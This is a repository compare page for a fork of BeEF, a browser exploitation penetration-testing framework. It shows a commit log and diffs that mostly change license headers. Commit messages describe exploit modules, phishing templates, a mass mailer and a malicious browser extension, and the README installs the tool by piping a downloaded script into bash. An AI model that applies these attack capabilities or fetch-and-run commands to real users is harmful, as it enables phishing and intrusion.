Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.6
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.3.8
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

125 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
Wade Alcorn
1aff4da0b8 Merge remote-tracking branch 'origin/master' 2012-11-02 15:43:51 +10:00
Wade Alcorn
d2188b230c More changed license headers 2012-11-02 15:27:01 +10:00
Wade Alcorn
23f09b919f Changed license header 2012-11-02 14:26:10 +10:00
Wade Alcorn
b68df3d024 Changed license header 2012-11-02 14:05:15 +10:00
Wade Alcorn
447f61c71b Changed license header and stdout banner 2012-11-02 14:00:44 +10:00
Wade Alcorn
f702482764 Added new boilerplate licence file 2012-11-02 13:57:33 +10:00
Wade Alcorn
0e3dbb23ee Added new licence file 2012-11-02 13:56:17 +10:00
bcoles
bfba800a93 Revert "Version updated to 0.4.3.9-alpha" 
This reverts commit b62c791961.
 2012-11-01 17:59:59 +10:30
bcoles
b62c791961 Version updated to 0.4.3.9-alpha 2012-11-01 17:46:03 +10:30
bcoles
b756065d2a Update Inter-Protocol IRC module to use beef.dom.createIframeIpecForm 2012-10-31 00:04:54 +10:30
bcoles
210dc1366a Add QNX QCONN exploit 2012-10-27 18:55:33 +10:30
bcoles
72ac600f9f Add createIframeIpecForm function to client dom library 2012-10-27 18:53:29 +10:30
bcoles
d7f0a590b7 Fix typo in popup detection 2012-10-27 18:53:04 +10:30
bcoles
a3a8bf2f15 Add command module IDs to logs 2012-10-26 16:45:00 +10:30
bcoles
34bae7d513 Add command module IDs to logs 2012-10-26 16:42:28 +10:30
bcoles
abd8f538eb Remove demos/html/passwd_manager_theft.html 
Small syntax changes to Event Logger extension `parse()`
 2012-10-25 16:38:29 +10:30
antisnatchor
79309b7331 Merge branch 'master' of https://github.com/beefproject/beef 2012-10-24 11:12:58 -05:00
antisnatchor
f9b8e0f576 Moved admin_ui controllers for extensions in their relative extension directory. 2012-10-23 10:15:07 +11:00
antisnatchor
deffc8691c Fixed event logger: events were not logged for a wrong data structure type check. 2012-10-23 09:50:01 +11:00
bcoles
7c7fc5ae6e Small modifications to a few modules 
Updated a few default IP addresses to 127.0.0.1

Updated a few module names

Fixed config.yaml whitespace bug
 2012-10-22 23:26:33 +10:30
antisnatchor
ce4018d464 Enabled IPEC extension in main config.yaml 2012-10-22 17:26:59 +11:00
antisnatchor
636fee9607 Modified Fake_flash_update module (with drop-down menu) to support Firefox Extension delivery. 2012-10-22 17:25:16 +11:00
antisnatchor
9aab6f1cf4 Patched jquery-encoder to prevent exception on encoderForJavascript. Patched wterm.jquery.js to prevent XSS. Added IP/port validation to IPEC shell. 2012-10-22 17:19:46 +11:00
antisnatchor
aae9f5b66c Removed dead code from the IPEC admin_ui tab panel. 2012-10-22 16:12:43 +11:00
antisnatchor
aa1efd1c73 Added new IPEC admin_ui tab. This includes the new Wterm-based interactive shell to communicate with the BeEF_bind shellcode. 2012-10-22 16:09:34 +11:00
antisnatchor
79bf6f4a9f Added BeEF_bind send_command module: this is used to communicate with the BeEF_bind shellcode (including in the IPEC admin_ui shell). 2012-10-22 16:07:31 +11:00
antisnatchor
e257f8bb52 Added BeEF_bind deployer module: send both shellcode stager and stage to a specific target. Eudora IMAP 3 (Win) is the only available exploit atm. 2012-10-22 16:03:47 +11:00
antisnatchor
b8c36b206b Added first implementation of the IPEC extension, including the malicious FirefoxExtension. 2012-10-22 15:52:15 +11:00
antisnatchor
5a2f30a0c0 Added a bunch of new RESTful API calls: get categories, search module by name. 2012-10-22 15:30:27 +11:00
antisnatchor
cbbb9e0d67 Added feature to bind_socket in AssetHandler: now it's possible to retrieve the raw data sent to the socket. 2012-10-22 15:24:21 +11:00
antisnatchor
af53f0fd0b Catching exception in web_cloner when determining if page can be framed. 2012-10-22 15:22:04 +11:00
bcoles
91e1411888 Added support for Chrome 22 2012-10-19 09:35:29 +10:30
bcoles
042ee1b0aa Hide QRcode for localhost/127.0.0.1 interface 2012-10-19 09:15:07 +10:30
bcoles
2863fafc2a Added support for Firefox 16 
Fixed bug where new versions of Firefox are detected as Safari

Added placeholder for IE10
 2012-10-16 20:39:28 +10:30
radoen
b20dec0adf ISSUES #713 Fixed 2012-10-14 01:52:17 +02:00
antisnatchor
aad6228ea8 Fix issues #757 : normalizing mount points for web_cloner in case they contain params. 2012-10-11 11:21:06 +01:00
bmantra
8e9f82ff2a Merge pull request #756 from bmantra/master 
added some more default paths for metasploit-autolaunch
 2012-10-07 10:28:01 -07:00
bmantra
22bb8998b2 added more default paths for the msf-autolaunch 2012-10-07 19:26:02 +02:00
bcoles
0f81e38635 Fix YAML config: extensions/social_engineering/config.yaml 
Prevents this error due to lack of white space between array elements:

`[!] Unable to load extension configuration '/pentest/web/beef-git/extensions/social_engineering/config.yaml'`
 2012-10-07 17:57:51 +10:30
bmantra
2b3654b1bb Merge pull request #755 from bmantra/master 
HP uCMDB CSRF add user module
 2012-10-05 04:26:20 -07:00
bmantra
03da56fc7d HP uCMDB CSRF add user module 2012-10-05 13:23:24 +02:00
bmantra
a0891dbccb Merge pull request #754 from bmantra/master 
For now disable the auto msfrpcd load by default
 2012-10-04 11:55:54 -07:00
bmantra
d04461d8ff disable auto msfrpcd 2012-10-04 20:50:51 +02:00
bmantra
f10f374a72 Merge pull request #753 from bmantra/master 
Initial metasploit auto launch commit #96
 2012-10-04 11:03:35 -07:00
Roos
480e797853 auto launch metasploit initial commit 2012-10-04 19:53:36 +02:00
Michele Orru
50df4f1e35 Merge pull request #752 from gallypette/master 
New template for simple_hijacker social engineering module.
 2012-10-01 08:40:13 -07:00
Jean-Louis Huynen
7e43e15838 modified config.yaml of simple_hijacker to activate chromecertbeggar2.js template 2012-10-01 16:11:18 +02:00
Jean-Louis Huynen
104f8189d3 added chromecertbeggar2.js 2012-10-01 16:06:45 +02:00
bcoles
ba20f17831 Ugh. Apparently target can't be null. Fixed. 2012-09-30 18:50:28 +09:30
bcoles
a135e9f51f Update supported browsers for multiple modules 
Pretty Theft module does not work in IE

Multiple exploit modules haven't been tested
 2012-09-29 17:39:14 +09:30
Brendan Coles
256f63d28a Merge pull request #748 from pwndizzle/master 
Update to Pretty_Theft module
 2012-09-23 00:18:49 -07:00
bcoles
95f5d78acc Update supported browsers for lcamtuf download module 
Opera blocks the `data:` URL popup by default.

Safari is no longer listed as either supported nor unsupported pending
further testing.
 2012-09-23 16:04:25 +09:30
pwndizzle
483683ca78 Added Facebook and Linkedin popups, also some code/logic improvements 2012-09-22 18:38:09 +08:00
Michele Orru
fe87d382db Merge pull request #747 from gallypette/master 
Small change in Chromecertbeggar template of simple_hijacker module
 2012-09-20 03:31:57 -07:00
Jean-Louis Huynen
68bfb46bc7 remplace setInterval by setTimeout in chromecerbeggar.js template 2012-09-20 11:26:27 +02:00
bmantra
edf99db187 Merge pull request #746 from bmantra/master 
fix for jboss exploit
 2012-09-18 12:01:44 -07:00
bmantra
9b62ae83dc fix jboss exploit with forge_request 2012-09-18 20:59:54 +02:00
antisnatchor
9c7c81bd7f Web_cloner: managed a corner case when html elements are uppercase (HEAD, FORM) 2012-09-17 12:54:10 +01:00
antisnatchor
e56b083ad5 Fixed typos in readme.txt for web_cloner 2012-09-17 11:03:13 +01:00
antisnatchor
074ca17e42 Added missing cloned_page directory to web_cloner. Added readme.txt on that directory. Enabled the social engineering extension by default. Enabled all the obfuscation techniques in the evasion extension config. 2012-09-17 10:58:07 +01:00
Wade Alcorn
87e3262bae Tidied up splash 2012-09-14 21:36:50 +10:00
Wade Alcorn
c8b7b506fa Tidied up splash 2012-09-14 21:24:10 +10:00
Wade Alcorn
921a9928ff Added twitter account to stdout 2012-09-14 21:10:32 +10:00
Wade Alcorn
62768e1ea2 Changed update method in stdout 2012-09-14 21:08:47 +10:00
Brendan Coles
3b07e700a5 Merge pull request #744 from webstersprodigy/improved-clickjacking 
Clickjacking Module Update: Better reliability in IE
 2012-09-12 19:31:22 -07:00
Rich Lundeen
0b852dd308 Made namespaces consistent and expanded body 
Adding feedback I missed earlier regarding namespaces. Also since
we're using body instead of window (for IE support), expanding the
body so that the mouse follows everywhere.
 2012-09-11 23:17:50 -07:00
Rich Lundeen
2720a5a8b9 Better reliability in IE 2012-09-11 13:09:37 -07:00
Brendan Coles
1c1f2d1f1c Merge pull request #743 from webstersprodigy/improved-clickjacking 
Improved clickjacking
 2012-09-10 23:02:14 -07:00
Rich Lundeen
bcf842587f Fixed several minor bugs 2012-09-10 15:36:57 -07:00
Rich Lundeen
cef72c9518 Improved Clickjacking Module 
Rewrite of bcole's module. Adds support for multiple clicks, Javascript
event feedback, some basic framebusting evasion, and IE support
 2012-09-10 14:25:46 -07:00
Wade Alcorn
19b1baee43 Version updated 2012-09-10 21:19:41 +10:00
bcoles
9e47942d3f Added FreeNAS remote reverse root shell CSRF module 
For more information see: http://support.freenas.org/ticket/1788
 2012-09-09 21:05:16 +09:30
antisnatchor
69c59bb427 Social Eng. extension: moved the extension config line in main config file. 2012-09-07 17:21:17 +01:00
antisnatchor
4218f44203 Merge branch 'master' of https://github.com/beefproject/beef 2012-09-07 17:18:04 +01:00
bcoles
384fe7bcab Fix issue #741 2012-09-07 23:00:24 +09:30
bcoles
8625452751 Add support for Firefox 15 2012-09-07 20:30:19 +09:30
antisnatchor
0dd06d6ecb Merge branch 'master' of https://github.com/beefproject/beef 2012-09-07 08:41:13 +01:00
antisnatchor
5fc56a9dfa Social Eng. extension: added stub for mass_mailer DB structure 2012-09-07 08:41:02 +01:00
antisnatchor
6ac074d2b0 Social Eng. extension: now the web_cloner can serve modified pages as well. This is needed when the page use custom logic to submit the form. Added an example of an Edf Energy modified page. 2012-09-06 12:37:26 +01:00
antisnatchor
b3ae5f1016 Social Eng. extension: added EDG Energy template configuration in config.yaml 2012-09-06 11:30:33 +01:00
antisnatchor
64ba4686f4 Social Eng. Extension: added EDF Energy phishing template :D 2012-09-06 11:27:12 +01:00
antisnatchor
2f5fc46a8e Social Eng. Extension: fixed a bug in mass_mailer when choosing a different template. 2012-09-06 11:26:31 +01:00
Michele Orru
45b839d970 Merge pull request #740 from gallypette/master 
Simple_hijacker module (Social engineering): Awesome, merging it straight away ;)
 2012-09-06 02:07:42 -07:00
bcoles
085f2775f3 Added beef.browser.hasCors() function 2012-09-06 17:50:27 +09:30
Jean-Louis Huynen
716e7fe712 Change stupid code that made this module unusable with the API to something less stupid (i hope) 2012-09-05 15:16:21 +02:00
Jean-Louis Huynen
05d7fe3adf Adding the Simple Hijacker module in social engineering (route clicks on some links to javascript code) 2012-09-04 17:47:59 +02:00
qswain2
931aeb6ee5 Fixed the module count in the ui to include sub modules (issue 708) 2012-09-03 09:46:03 -04:00
antisnatchor
31387a0aa6 Social Eng. extension: massmailer -> calling IO.popen in a secure way 2012-09-02 19:00:40 +01:00
antisnatchor
d881852216 Social Eng. extension: added notes about 'wget' and 'file' commands required for the extension. 2012-09-02 17:26:38 +01:00
antisnatchor
ed9b1d5c2e Social Eng. Extension: webcloner ->calling IO.popen in a secure way 2012-09-02 17:25:50 +01:00
antisnatchor
ae72f9fedf Social Eng. extension: added request.ip to interceptor logs, adapted output 2012-09-02 16:23:53 +01:00
bcoles
ab588c0f68 Add link_rewrite_tel module 
Fixes issue #721
 2012-09-02 16:58:43 +09:30
antisnatchor
8eb0e2d973 Social Eng. Extension: Added DB structure and logic for web_cloner and interceptor. 2012-09-01 15:15:30 +01:00
Michele Orru
01ea6e4a04 Merge pull request #737 from gallypette/master 
Added Whitespace Evasion technique!
 2012-08-31 07:32:46 -07:00
antisnatchor
9b1cae6790 Added social_engineering extension to main BeEF config file. 2012-08-31 15:22:09 +01:00
antisnatchor
6b5302ef21 Social Eng. Extension: Added RESTful API calls for both mass_mailer and web_cloner 2012-08-31 14:08:08 +01:00
antisnatchor
a6a9af8483 Minor changes to main Server class (mounts need to be an instance variable) 2012-08-31 14:07:33 +01:00
antisnatchor
9ea0f60138 Social Eng. extension: added default PDF attachment to config.yaml 2012-08-29 22:48:45 +01:00
antisnatchor
6409b3d98f Social Eng. extension: mount point for phishing page is not configurable, refactored Interceptor initialization using config settings 2012-08-29 22:36:24 +01:00
antisnatchor
26c7696e0f Social Eng. extension: if the page can be framed, load it in an overlay iFrame maintaining the hook :D 2012-08-29 21:08:07 +01:00
antisnatchor
0260181d33 Social Eng. extension: added redirection after POST interception, refactored Interceptor class 2012-08-29 19:33:14 +01:00
antisnatchor
20d2e17232 Social Eng. extension: added support for SMTP servers that do not require authentication 2012-08-29 17:50:14 +01:00
antisnatchor
92b2382e25 Social Eng. extension: added support to specify attachments, added automatic MIME type guessing 2012-08-29 17:38:37 +01:00
Jean-Louis Huynen
e86712413c modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :) 2012-08-29 18:22:22 +02:00
Jean-Louis Huynen
788cef08d3 add whitespace obfuscation technique - should work in theory - but does not in practice 2012-08-29 13:54:26 +02:00
antisnatchor
ffbd3d65b9 Social Eng. extension: various fixes, link/linktext/fromname configurable, adjusted various email headers 2012-08-27 21:30:09 +01:00
antisnatchor
df056fb688 Social Eng. extension: added configurable email templates 2012-08-27 16:10:40 +01:00
antisnatchor
26c86951a4 Social Eng. extension: added mass mailer 2012-08-27 14:30:10 +01:00
antisnatchor
558ca03ef6 Social Eng. extension: added basic structure and web cloner 2012-08-27 10:28:03 +01:00
antisnatchor
42c348f3f2 Added timeout.js that calls beef_init an fix some nasty cross-domain hooking issues when the hooking process was not started. 2012-08-25 10:26:16 +01:00
antisnatchor
b6c12fd0f3 Added copyright to are.js 2012-08-25 10:25:31 +01:00
bcoles
57f68725bc Moved lcamtuf download module to social engineering category 2012-08-25 18:54:15 +09:30
antisnatchor
50e7a1c206 Refactored WebSocket code. 2012-08-25 10:18:56 +01:00
antisnatchor
5400696c40 Refactored and modified beefjs.rb: splitted external lib files from beef files, added the feature for #734 to exclude some core lib js files (like jquery) from obfuscation 2012-08-25 09:58:25 +01:00
antisnatchor
7ed9516b53 Obfuscation: removed base64 from the default chain list, added excluded_core_js option 2012-08-25 09:55:53 +01:00
antisnatchor
aeb17e7d7a Changed target support to notify_all for lcamtuf download module (pop-up blockers) 2012-08-24 19:46:02 +01:00
bmantra
7c26ac6a1e Merge pull request #735 from bmantra/master 
fixes #725 initial commit for lcamtuf download trick module
 2012-08-24 11:27:25 -07:00
bmantra
f852ca26cb lcamtuf download module 2012-08-24 20:24:37 +02:00
Mike Haworth
5a9a050c1c added new phonegap modules, to check connection type (wifi/3g) and ensure beef hook survives suspend resume of app. 2012-08-22 20:51:49 +12:00
Mike Haworth
ad2bc95cf0 updated local file theft to accept custom file path 2012-08-22 20:50:03 +12:00
Mike Haworth
f2d4a88810 added abilty to detect new phonegap renamed 'cordova' 2012-08-22 20:48:55 +12:00
Wade Alcorn
6897962803 Version updated 2012-08-15 13:39:16 +10:00
sussurro
8c43fffb36 Fixed Twitter client to not cause errors on failed tweets allowing logins etc to continue 2012-08-12 19:27:19 -07:00
radoen
93bb25aa0b Set to false websocket and https 2012-08-10 13:47:42 +02:00
radoen
5697eac123 Added support for wss, issue #714 2012-08-10 13:43:48 +02:00
718 changed files with 9288 additions and 9486 deletions
Expand all files Collapse all files

16
Gemfile
View File

@@ -1,19 +1,9 @@
# BeEF's Gemfile
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Gems only required on Windows, or with specific Windows issues

16
INSTALL.txt
View File

@@ -1,18 +1,8 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================

158
README
View File

@@ -1,84 +1,74 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
What is BeEF?
-------------
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
$ ./beef
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
Please, send us pull requests!
Web: http://beefproject.com/
Mail: beef-subscribe@bindshell.net
IRC: ircs://irc.freenode.net/beefproject
Twitter: @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
Usage
-----
To get started, simply execute beef and follow the instrustions:
$ ./beef

158
README.mkd
View File

@@ -1,84 +1,74 @@
===============================================================================
Copyright 2012 Wade Alcorn wade@bindshell.net
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__IRC:__ ircs://irc.freenode.net/beefproject
__Twitter:__ @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
-----
To get started, simply execute beef and follow the instructions:
$ ./beef
===============================================================================
Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
===============================================================================
What is BeEF?
-------------
__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser.
Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.
Get Involved
------------
You can get in touch with the BeEF team. Just check out the following:
__Please, send us pull requests!__
__Web:__ http://beefproject.com/
__Mail:__ beef-subscribe@bindshell.net
__IRC:__ ircs://irc.freenode.net/beefproject
__Twitter:__ @beefproject
Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
Quick Start
-----------
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
$ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
Usage
-----
To get started, simply execute beef and follow the instructions:
$ ./beef

16
Rakefile
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
task :default => ["quick"]

18
VERSION
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
0.4.3.6-alpha
0.4.3.8-alpha

27
beef
View File

@@ -1,19 +1,9 @@
#!/usr/bin/env ruby
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# stop deprecation warning from being displayed
@@ -81,7 +71,7 @@ Socket.do_not_reverse_lookup = true
case config.get("beef.database.driver")
when "sqlite"
DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}")
when "mysql","postgres"
when "mysql", "postgres"
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
@@ -124,12 +114,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}"
#@note Starts the WebSocket server
if config.get("beef.http.websocket.enable")
BeEF::Core::Websocket::Websocket.instance
print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]"
